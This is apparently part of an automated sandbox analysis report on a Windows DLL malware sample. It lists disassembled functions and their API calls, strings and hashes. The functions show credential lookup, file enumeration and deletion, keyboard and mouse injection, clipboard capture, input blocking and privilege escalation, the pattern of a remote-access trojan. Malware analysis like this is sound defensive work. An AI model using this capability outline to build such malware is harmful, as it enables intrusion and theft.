                        • Snapshot File: hcaresult_0_2_10000000_ILQ18dgzMU.jbxd
                        Yara matches
                        Similarity
                        • API ID: AccountLookupName
                        • String ID: .$2$3$ConvertSidToStringSidA$L$_RasDefaultCredentials#0$i$p$v
                        • API String ID: 1484870144-2807325862
                        • Opcode ID: ab617baf0044a936d9b6e32e43863455450b5f4a7cca8fb716140444f9bdc7e5
                        • Instruction ID: d64c3562a74c9d844cf2b9e399e1d0a943de8f6cf6822a612caecbb065840d09
                        • Opcode Fuzzy Hash: ab617baf0044a936d9b6e32e43863455450b5f4a7cca8fb716140444f9bdc7e5
                        • Instruction Fuzzy Hash: D121417140C381AFE301CB64D884B9BBBE4ABE5744F44894DF4D846252E3B9DA4DC7A3
                        Function 10008CE0 Relevance: 21.2, APIs: 9, Strings: 3, Instructions: 167filestringCOMMON
                        Download Yara Rule
                        APIs
                        • lstrlen.KERNEL32(?,?,?,?), ref: 10008D1A
                        • wsprintfA.USER32 ref: 10008D53
                        • FindFirstFileA.KERNEL32(?,?,?,?,?,?), ref: 10008D65
                        • wsprintfA.USER32 ref: 10008DA4
                        • wsprintfA.USER32 ref: 10008DC7
                        • ??2@YAPAXI@Z.MSVCRT(00000018,?,00000001,?,?,?,?,?,?,?,?,?), ref: 10008E3D
                        • ??3@YAXPAX@Z.MSVCRT(0000005C), ref: 10008EA6
                        • FindNextFileA.KERNEL32(?,?), ref: 10008ED5
                        • FindClose.KERNEL32(?), ref: 10008EE8
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.4083122327.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                        • Associated: 00000000.00000002.4083106981.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083160359.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083240295.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_10000000_ILQ18dgzMU.jbxd
                        Yara matches
                        Similarity
                        • API ID: Findwsprintf$File$??2@??3@CloseFirstNextlstrlen
                        • String ID: %s%s%s$%s%s*.*$.
                        • API String ID: 862180513-1343461528
                        • Opcode ID: 1e4886bd2802d4f5ea9959e9ac349dfa12a613cb16150e6f96304a6cfa4fdc5d
                        • Instruction ID: b1b0e193b69be4eaeb5c818192461939a3ae05ac51ddcda8d5a58c01dea45e8d
                        • Opcode Fuzzy Hash: 1e4886bd2802d4f5ea9959e9ac349dfa12a613cb16150e6f96304a6cfa4fdc5d
                        • Instruction Fuzzy Hash: 7B51E2B14083809FE724CF28C884A9BBBE9FBC8750F404A2DF5D957291DB75EA05CB56
                        Function 10008880 Relevance: 19.3, APIs: 8, Strings: 3, Instructions: 71fileCOMMON
                        Download Yara Rule
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.4083122327.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                        • Associated: 00000000.00000002.4083106981.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083160359.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083240295.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_10000000_ILQ18dgzMU.jbxd
                        Yara matches
                        Similarity
                        • API ID: Find$Filewsprintf$CloseDirectoryFirstNextRemove
                        • String ID: %s\%s$%s\*.*$.
                        • API String ID: 2470771279-1471744235
                        • Opcode ID: 5abeff20f9f18db7376b121c5d3078da859a8e53ccbe245416597d0a9c8e9ce2
                        • Instruction ID: 669aa932086da9125cd017c4c2cfdb9687acb91c6e27b2c3e8e8e8e02ca910ac
                        • Opcode Fuzzy Hash: 5abeff20f9f18db7376b121c5d3078da859a8e53ccbe245416597d0a9c8e9ce2
                        • Instruction Fuzzy Hash: 6111D871104395ABF320EBA0DC88AFB77ACEFC5350F444C29F99582040EBB5964887A3
                        Function 1000A840 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 82registrystringsleepCOMMON
                        Download Yara Rule
                        APIs
                        • RegOpenKeyExA.ADVAPI32(80000000,Applications\iexplore.exe\shell\open\command,00000000,000F003F,?), ref: 1000A88A
                        • RegQueryValueA.ADVAPI32(?,00000000,?,00000104), ref: 1000A8A8
                        • RegCloseKey.ADVAPI32(?), ref: 1000A8B3
                        • Sleep.KERNEL32(00000001), ref: 1000A8BB
                        • lstrlen.KERNEL32(?), ref: 1000A8C6
                        • strstr.MSVCRT ref: 1000A8DA
                        • lstrcpy.KERNEL32(00000000,?), ref: 1000A8E9
                        • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 1000A93E
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.4083122327.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                        • Associated: 00000000.00000002.4083106981.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083160359.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083240295.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_10000000_ILQ18dgzMU.jbxd
                        Yara matches
                        Similarity
                        • API ID: CloseCreateOpenProcessQuerySleepValuelstrcpylstrlenstrstr
                        • String ID: Applications\iexplore.exe\shell\open\command$D
                        • API String ID: 454182167-535818822
                        • Opcode ID: 68732c813db4184f186f9e45452af0178c35621229585ca1c16e117d74558c43
                        • Instruction ID: f936bf2a25ad81077c642828375e01827ce352aafac8712ae75b0a8a7f7d7efe
                        • Opcode Fuzzy Hash: 68732c813db4184f186f9e45452af0178c35621229585ca1c16e117d74558c43
                        • Instruction Fuzzy Hash: A6218D70208342ABF710CB60CD49FAB77E9EBC9750F00491CF685962D0DBF8A949CB62
                        Function 1004C440 Relevance: 17.3, Strings: 13, Instructions: 1082COMMON
                        Download Yara Rule
                        Strings
                        • *** EMPTY bf: head=%i tail=%i queue: head=%i tail=%i size=%i, xrefs: 1004CE0A
                        • *** IFRAME bf: head=%i tail=%i queue: head=%i tail=%i size=%i, xrefs: 1004CC18
                        • *** PFRAME bf: head=%i tail=%i queue: head=%i tail=%i size=%i, xrefs: 1004CB54, 1004D134
                        • PVOP, xrefs: 1004CB78
                        • CLOSED GOP BVOP->PVOP, xrefs: 1004CAD5
                        • *** XXXXXX bf: head=%i tail=%i queue: head=%i tail=%i size=%i, xrefs: 1004C9B0
                        • %d st:%lld if:%d, xrefs: 1004C7E4
                        • *** BFRAME (flush) bf: head=%i tail=%i queue: head=%i tail=%i size=%i, xrefs: 1004CD4E
                        • *** END, xrefs: 1004D187
                        • *** FINISH bf: head=%i tail=%i queue: head=%i tail=%i size=%i, xrefs: 1004D02C
                        • *** BFRAME (store) bf: head=%i tail=%i queue: head=%i tail=%i size=%i quant=%i, xrefs: 1004C932
                        • IVOP, xrefs: 1004CC3C
                        • BVOP, xrefs: 1004C81A
                        Memory Dump Source
                        • Source File: 00000000.00000002.4083122327.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                        • Associated: 00000000.00000002.4083106981.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083160359.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083240295.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_10000000_ILQ18dgzMU.jbxd
                        Yara matches
                        Similarity
                        • API ID: vsprintf
                        • String ID: %d st:%lld if:%d$*** BFRAME (flush) bf: head=%i tail=%i queue: head=%i tail=%i size=%i$*** BFRAME (store) bf: head=%i tail=%i queue: head=%i tail=%i size=%i quant=%i$*** EMPTY bf: head=%i tail=%i queue: head=%i tail=%i size=%i$*** END$*** FINISH bf: head=%i tail=%i queue: head=%i tail=%i size=%i$*** IFRAME bf: head=%i tail=%i queue: head=%i tail=%i size=%i$*** PFRAME bf: head=%i tail=%i queue: head=%i tail=%i size=%i$*** XXXXXX bf: head=%i tail=%i queue: head=%i tail=%i size=%i$BVOP$CLOSED GOP BVOP->PVOP$IVOP$PVOP
                        • API String ID: 2974291354-2148658119
                        • Opcode ID: da214e7fa552f9e790009c7980666f32f598568cfcb8517d04cba6165920b4aa
                        • Instruction ID: 36db5a55f6f7bbe783c0ce6e97a3ddc02fd9f6034b996215d71c935e3a740a46
                        • Opcode Fuzzy Hash: da214e7fa552f9e790009c7980666f32f598568cfcb8517d04cba6165920b4aa
                        • Instruction Fuzzy Hash: ADA217B5A042889FDB68CF18C881FEA77E5FB88304F14862DED498B351D770EA45CB95
                        Function 100084F0 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 130stringCOMMON
                        Download Yara Rule
                        APIs
                        • GetLogicalDriveStringsA.KERNEL32 ref: 10008511
                        • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,?,00000104), ref: 10008567
                        • SHGetFileInfo.SHELL32(?,00000080,?,00000160,00000410), ref: 10008585
                        • lstrlen.KERNEL32(?), ref: 10008599
                        • lstrlen.KERNEL32(?), ref: 100085A7
                        • GetDiskFreeSpaceExA.KERNEL32(00000001,?,?,00000000), ref: 100085C6
                        • GetDriveTypeA.KERNEL32(?), ref: 1000860D
                        • lstrlen.KERNEL32(?), ref: 10008677
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.4083122327.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                        • Associated: 00000000.00000002.4083106981.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083160359.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083240295.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_10000000_ILQ18dgzMU.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrlen$Drive$DiskFileFreeInfoInformationLogicalSpaceStringsTypeVolume
                        • String ID: g
                        • API String ID: 2496086942-30677878
                        • Opcode ID: b1f0603da955b9deec9a7e30b8dcfd22e7aa198ea86b18fd6141ef5117c09393
                        • Instruction ID: bd1b9881f0be87f73bf4931a3af0dd25f56242c05abfce1c01fbda5312f2509a
                        • Opcode Fuzzy Hash: b1f0603da955b9deec9a7e30b8dcfd22e7aa198ea86b18fd6141ef5117c09393
                        • Instruction Fuzzy Hash: AF41D6705083859FD715CF14C840AAFB7EAFFC8344F04492DF98997251D7B0AA49CBA2
                        Function 1000F9D0 Relevance: 13.7, APIs: 9, Instructions: 163keyboardCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 10012B10: GetCurrentThreadId.KERNEL32 ref: 10012B22
                          • Part of subcall function 10012B10: GetThreadDesktop.USER32(00000000), ref: 10012B29
                          • Part of subcall function 10012B10: GetUserObjectInformationA.USER32(00000000,00000002,?,00000100,?), ref: 10012B56
                          • Part of subcall function 10012B10: OpenInputDesktop.USER32(00000000,00000000,02000000), ref: 10012B61
                          • Part of subcall function 10012B10: GetUserObjectInformationA.USER32(00000000,00000002,?,00000100,?), ref: 10012B8E
                          • Part of subcall function 10012B10: lstrcmpiA.KERNEL32(?,?), ref: 10012B9D
                          • Part of subcall function 10012B10: SetThreadDesktop.USER32(00000000), ref: 10012BA8
                          • Part of subcall function 10012B10: CloseDesktop.USER32(00000000), ref: 10012BC0
                          • Part of subcall function 10012B10: CloseDesktop.USER32(00000000), ref: 10012BC3
                        • SetCursorPos.USER32(?,?,?,?,?,?,1000F5FF,?,?,00000000), ref: 1000FA38
                        • WindowFromPoint.USER32(?,?,?,?,?,?,1000F5FF,?,?,00000000), ref: 1000FA40
                        • SetCapture.USER32(00000000,?,?,?,?,1000F5FF,?,?,00000000), ref: 1000FA47
                        • MapVirtualKeyA.USER32(?,00000000), ref: 1000FA86
                        • keybd_event.USER32(?,00000000), ref: 1000FA90
                        • MapVirtualKeyA.USER32(?,00000000), ref: 1000FAA4
                        • keybd_event.USER32(00000000,00000000), ref: 1000FAAE
                        • mouse_event.USER32(00000008,00000000,00000000,00000000,00000000), ref: 1000FB6A
                        Memory Dump Source
                        • Source File: 00000000.00000002.4083122327.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                        • Associated: 00000000.00000002.4083106981.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083160359.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083240295.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_10000000_ILQ18dgzMU.jbxd
                        Yara matches
                        Similarity
                        • API ID: Desktop$Thread$CloseInformationObjectUserVirtualkeybd_event$CaptureCurrentCursorFromInputOpenPointWindowlstrcmpimouse_event
                        • String ID:
                        • API String ID: 1258999209-0
                        • Opcode ID: 6ee3277e865b55dc97bfe5344af86ba04143f10aa31d970df9b3cb410169750c
                        • Instruction ID: f5d10c0a343a29c8425a531d233686d834a6ea72a830d3e4a23e197e1be1dea8
                        • Opcode Fuzzy Hash: 6ee3277e865b55dc97bfe5344af86ba04143f10aa31d970df9b3cb410169750c
                        • Instruction Fuzzy Hash: C2419D71BC0321B6F630CA148C9BF2A7659E785F81F304119F701FE9C9C6E4B900AA5D
                        Function 1000FC20 Relevance: 13.6, APIs: 9, Instructions: 57clipboardCOMMON
                        Download Yara Rule
                        APIs
                        • OpenClipboard.USER32(00000000), ref: 1000FC2A
                        • GetClipboardData.USER32(00000001), ref: 1000FC36
                        • CloseClipboard.USER32 ref: 1000FC46
                        • GlobalSize.KERNEL32(00000000), ref: 1000FC55
                        • GlobalLock.KERNEL32(00000000), ref: 1000FC5F
                        • ??2@YAPAXI@Z.MSVCRT(00000001), ref: 1000FC68
                        • GlobalUnlock.KERNEL32(?), ref: 1000FC8F
                        • CloseClipboard.USER32 ref: 1000FC95
                        • ??3@YAXPAX@Z.MSVCRT(00000000,00000000,00000001), ref: 1000FCA7
                        Memory Dump Source
                        • Source File: 00000000.00000002.4083122327.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                        • Associated: 00000000.00000002.4083106981.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083160359.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083240295.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_10000000_ILQ18dgzMU.jbxd
                        Yara matches
                        Similarity
                        • API ID: Clipboard$Global$Close$??2@??3@DataLockOpenSizeUnlock
                        • String ID:
                        • API String ID: 3218637236-0
                        • Opcode ID: 301b849cb216ea75fb687118c830899b240c7ce3f9174140f969f020cf22927b
                        • Instruction ID: b2ebfa32c9fb2684969518ebc31350a2b2d993565be8939cec1bf41d42c3659a
                        • Opcode Fuzzy Hash: 301b849cb216ea75fb687118c830899b240c7ce3f9174140f969f020cf22927b
                        • Instruction Fuzzy Hash: E60126355003645FE700EB349C8AAAB379AFF45741F44452CFD0686200EBB5AC08C6B2
                        Function 1000FBB0 Relevance: 12.0, APIs: 8, Instructions: 38clipboardmemoryCOMMON
                        Download Yara Rule
                        APIs
                        • OpenClipboard.USER32(00000000), ref: 1000FBB2
                        • EmptyClipboard.USER32 ref: 1000FBBE
                        • GlobalAlloc.KERNEL32(00002000,?,?,?,?,?), ref: 1000FBCE
                        • GlobalLock.KERNEL32(00000000), ref: 1000FBDC
                        • GlobalUnlock.KERNEL32(00000000), ref: 1000FBF9
                        • SetClipboardData.USER32(00000001,00000000), ref: 1000FC02
                        • GlobalFree.KERNEL32(00000000), ref: 1000FC09
                        • CloseClipboard.USER32 ref: 1000FC10
                        Memory Dump Source
                        • Source File: 00000000.00000002.4083122327.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                        • Associated: 00000000.00000002.4083106981.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083160359.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083240295.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_10000000_ILQ18dgzMU.jbxd
                        Yara matches
                        Similarity
                        • API ID: ClipboardGlobal$AllocCloseDataEmptyFreeLockOpenUnlock
                        • String ID:
                        • API String ID: 453615576-0
                        • Opcode ID: beee4563180182b3370716e68273ada2ef01d43424950d4e564b3c7d5d6ba5bf
                        • Instruction ID: 1752c5a271f595f9706e0c601d6f08a1c3e9b8b4fbe7c48789eb342d89222aed
                        • Opcode Fuzzy Hash: beee4563180182b3370716e68273ada2ef01d43424950d4e564b3c7d5d6ba5bf
                        • Instruction Fuzzy Hash: A7F01D722003A59FF704AB709DCDA6B3A9AFB49752F040428FA02D6291CFA08C45D661
                        Function 1000F8D0 Relevance: 10.6, APIs: 7, Instructions: 84keyboardwindowsleepCOMMON
                        Download Yara Rule
                        APIs
                        • Sleep.KERNEL32(0000000A), ref: 1000F91C
                        • SystemParametersInfoA.USER32(00000056,00000001,00000000,00000000), ref: 1000F937
                        • SendMessageA.USER32(0000FFFF,00000112,0000F170,00000002), ref: 1000F94A
                        • SystemParametersInfoA.USER32(00000056,00000000,00000000,00000000), ref: 1000F966
                        • SendMessageA.USER32(0000FFFF,00000112,0000F170,000000FF), ref: 1000F979
                          • Part of subcall function 1000F3F0: WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,1006A281,000000FF,1000F595,?,?,?,?,?,?,1006A290,000000FF), ref: 1000F413
                          • Part of subcall function 1000F3F0: CloseHandle.KERNEL32(?,?,?,1006A281,000000FF,1000F595,?,?,?,?,?,?,1006A290,000000FF), ref: 1000F41D
                          • Part of subcall function 1000F3F0: ??2@YAPAXI@Z.MSVCRT(00000110,?,?,1006A281,000000FF,1000F595,?,?,?,?,?,?,1006A290,000000FF), ref: 1000F441
                        • BlockInput.USER32(?), ref: 1000F988
                          • Part of subcall function 1000FCC0: GetSystemMetrics.USER32(00000000), ref: 1000FCD7
                          • Part of subcall function 1000FCC0: GetSystemMetrics.USER32(00000001), ref: 1000FCE0
                        • BlockInput.USER32(00000000), ref: 1000F9BB
                        Memory Dump Source
                        • Source File: 00000000.00000002.4083122327.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                        • Associated: 00000000.00000002.4083106981.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083160359.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083240295.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_10000000_ILQ18dgzMU.jbxd
                        Yara matches
                        Similarity
                        • API ID: System$BlockInfoInputMessageMetricsParametersSend$??2@CloseHandleObjectSingleSleepWait
                        • String ID:
                        • API String ID: 1415795360-0
                        • Opcode ID: b34e5be86bb1df2f76dee073435c2ecf2f90dbbcc898db3eb2e9e0cd148aa2ae
                        • Instruction ID: 303fd76c0112ef43c9a7933eae0aa9ba37b9407a239ada42a8401ebc6e2605ad
                        • Opcode Fuzzy Hash: b34e5be86bb1df2f76dee073435c2ecf2f90dbbcc898db3eb2e9e0cd148aa2ae
                        • Instruction Fuzzy Hash: F921F33434038132FA04EB384C87BB967878F46BD4F50053DBA926FAC7CDA5A849A255
                        Function 100098B0 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 47COMMON
                        Download Yara Rule
                        APIs
                        • ??2@YAPAXI@Z.MSVCRT(00000400,?,74DF0F10,74DF2EE0,10002CFA,?,SSSSSS), ref: 100098B8
                        • FindResourceA.KERNEL32(?,0000006C,HOST), ref: 100098D9
                        • LoadResource.KERNEL32(?,00000000), ref: 100098E1
                        • LockResource.KERNEL32(00000000), ref: 100098E8
                        • ??3@YAXPAX@Z.MSVCRT(00000000), ref: 10009914
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.4083122327.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                        • Associated: 00000000.00000002.4083106981.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083160359.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083240295.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_10000000_ILQ18dgzMU.jbxd
                        Yara matches
                        Similarity
                        • API ID: Resource$??2@??3@FindLoadLock
                        • String ID: HOST
                        • API String ID: 472997506-4189257289
                        • Opcode ID: 8c517b5f3bbd63520dcb8db2eedc25fc22693cc3be8b45b814adf7f57f7ccd2d
                        • Instruction ID: f64103f3c24481811ed64f621906f441ddaf9767220d4c25fce88cdf2a31ebe8
                        • Opcode Fuzzy Hash: 8c517b5f3bbd63520dcb8db2eedc25fc22693cc3be8b45b814adf7f57f7ccd2d
                        • Instruction Fuzzy Hash: A0F096B37012102BF600D6B89C8AFAB628DDB86375F050439F745DB281DA659C5193B6
                        Function 10012110 Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                        Download Yara Rule
                        APIs
                        • GetCurrentProcess.KERNEL32(00000028,?,?,10009E80,?,00000000,00000000,00000001), ref: 10012120
                        • OpenProcessToken.ADVAPI32(00000000,?,10009E80,?,00000000,00000000,00000001), ref: 10012127
                        • LookupPrivilegeValueA.ADVAPI32(00000000,?,?), ref: 10012157
                        • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000010,00000000,00000000), ref: 1001216F
                        • GetLastError.KERNEL32 ref: 10012175
                        • CloseHandle.KERNEL32(?), ref: 10012186
                        Memory Dump Source
                        • Source File: 00000000.00000002.4083122327.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                        • Associated: 00000000.00000002.4083106981.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083160359.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083240295.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_10000000_ILQ18dgzMU.jbxd
                        Yara matches
                        Similarity
                        • API ID: ProcessToken$AdjustCloseCurrentErrorHandleLastLookupOpenPrivilegePrivilegesValue
                        • String ID:
                        • API String ID: 3398352648-0
                        • Opcode ID: d51332a10edc9ed0de53dc67db3489fbf75492b4b1e06feea115e57508ad5e88
                        • Instruction ID: 49b52ade7f2aec8d65d411800f1b7852c22338b435460913844ba7751feeb0b8
                        • Opcode Fuzzy Hash: d51332a10edc9ed0de53dc67db3489fbf75492b4b1e06feea115e57508ad5e88
                        • Instruction Fuzzy Hash: 1601B171604361ABF704DB64CC8AF9B77A9FF88B00F41891CFA858A190D6B4EC449BA1
                        Function 10009090 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 88fileCOMMON
                        Download Yara Rule
                        APIs
                        • FindFirstFileA.KERNEL32(00000021,?,00000021,00000000,00000001), ref: 100090CF
                        • FindClose.KERNEL32(00000000), ref: 10009149
                        • CreateFileA.KERNEL32(00000021,40000000,00000002,00000000,00000002,00000080,00000000), ref: 10009161
                        • CloseHandle.KERNEL32(00000000), ref: 1000918B
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.4083122327.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                        • Associated: 00000000.00000002.4083106981.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083160359.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083240295.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_10000000_ILQ18dgzMU.jbxd
                        Yara matches
                        Similarity
                        • API ID: CloseFileFind$CreateFirstHandle
                        • String ID: p
                        • API String ID: 3283578348-2181537457
                        • Opcode ID: 2c8b732b24ebe096cefe3b9dd28e29c66e00d67b571492c13087e5889d7322dd
                        • Instruction ID: a5be57352cfa6b7ba5ed919185f350865829bcd6be4795e4516047143afc81a4
                        • Opcode Fuzzy Hash: 2c8b732b24ebe096cefe3b9dd28e29c66e00d67b571492c13087e5889d7322dd
                        • Instruction Fuzzy Hash: 9531E2719083129BF324CF18CC4978E76E5EBC83A0F15863EF8999B2D4C6749C448B82
                        Function 10056430 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 996COMMON
                        Download Yara Rule
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.4083122327.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                        • Associated: 00000000.00000002.4083106981.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083160359.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
